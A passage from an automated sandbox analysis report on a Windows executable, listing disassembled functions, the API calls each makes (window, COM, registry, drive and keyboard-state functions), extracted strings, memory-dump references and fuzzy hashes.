                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                          • String ID:
                                                                          • API String ID: 3218148540-0
                                                                          • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                          • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                          • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                          • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                          Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                          • String ID:
                                                                          • API String ID: 136442275-0
                                                                          • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                          • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                          • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                          • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                          Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcsncpy.LIBCMT ref: 00467490
                                                                          • _wcsncpy.LIBCMT ref: 004674BC
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • _wcstok.LIBCMT ref: 004674FF
                                                                            • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                          • _wcstok.LIBCMT ref: 004675B2
                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                          • _wcslen.LIBCMT ref: 00467793
                                                                          • _wcscpy.LIBCMT ref: 00467641
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • _wcslen.LIBCMT ref: 004677BD
                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                            • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                          • String ID: X
                                                                          • API String ID: 3104067586-3081909835
                                                                          • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                          • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                          • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                          • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                          Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                          • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                          • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                          • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                          • _wcslen.LIBCMT ref: 0046CDB0
                                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                          • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                          • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                            • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                            • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                            • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                          Strings
                                                                          • NULL Pointer assignment, xrefs: 0046CEA6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 440038798-2785691316
                                                                          • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                          • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                          • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                          • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                          Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                          • _wcslen.LIBCMT ref: 004610A3
                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                          • GetWindowRect.USER32(?,?), ref: 00461248
                                                                            • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                                                          • String ID: ThumbnailClass
                                                                          • API String ID: 4136854206-1241985126
                                                                          • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                          • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                                                          • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                                                          • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                                                          Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                                                          • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                                                          • GetClientRect.USER32(?,?), ref: 00471A1A
                                                                          • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                          • String ID: 2
                                                                          • API String ID: 1331449709-450215437
                                                                          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                          Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                          • API String ID: 3054410614-2561132961
                                                                          • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                          • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                          Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                          • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                          • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                          • API String ID: 600699880-22481851
                                                                          • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                          • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                          • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                          • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                          Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyWindow
                                                                          • String ID: static
                                                                          • API String ID: 3375834691-2160076837
                                                                          • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                          • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                          • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                          • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                          Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                          • API String ID: 2907320926-3566645568
                                                                          • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                          • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                          • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                          • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                          Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                          • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                          • DeleteObject.GDI32(?), ref: 00470A04
                                                                          • DestroyIcon.USER32(?), ref: 00470A1C
                                                                          • DeleteObject.GDI32(?), ref: 00470A34
                                                                          • DestroyWindow.USER32(?), ref: 00470A4C
                                                                          • DestroyIcon.USER32(?), ref: 00470A73
                                                                          • DestroyIcon.USER32(?), ref: 00470A81
                                                                          • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 1237572874-0
                                                                          • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                          • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                          • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                          • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                          Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                          • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                          • VariantClear.OLEAUT32(?), ref: 00479489
                                                                          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                          • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID:
                                                                          • API String ID: 2706829360-0
                                                                          • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                          • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                          • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                          • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                          Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 0044480E
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                          • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                          • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                          • GetKeyState.USER32(00000011), ref: 00444903
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                          • GetKeyState.USER32(00000012), ref: 0044492D
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                          • GetKeyState.USER32(0000005B), ref: 00444958
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
